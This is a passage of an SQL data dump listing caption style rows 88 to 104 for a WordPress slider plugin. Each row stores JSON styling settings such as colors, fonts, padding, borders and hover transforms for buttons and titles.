(88,'.tp-caption.NotGeneric-CallToAction','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(89,'.tp-caption.NotGeneric-Icon','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(90,'.tp-caption.NotGeneric-Menuitem','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(91,'.tp-caption.MarkerStyle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(92,'.tp-caption.Gym-Menuitem','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(93,'.tp-caption.Newspaper-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(94,'.tp-caption.Newspaper-Subtitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(95,'.tp-caption.Newspaper-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(96,'.tp-caption.Newspaper-Title-Centered','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(97,'.tp-caption.Hero-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(98,'.tp-caption.Video-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(99,'.tp-caption.Video-SubTitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(100,'.tp-caption.NotGeneric-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(101,'.tp-caption.NotGeneric-BigButton','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(102,'.tp-caption.WebProduct-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(103,'.tp-caption.Restaurant-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(104,'.tp-caption.Gym-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
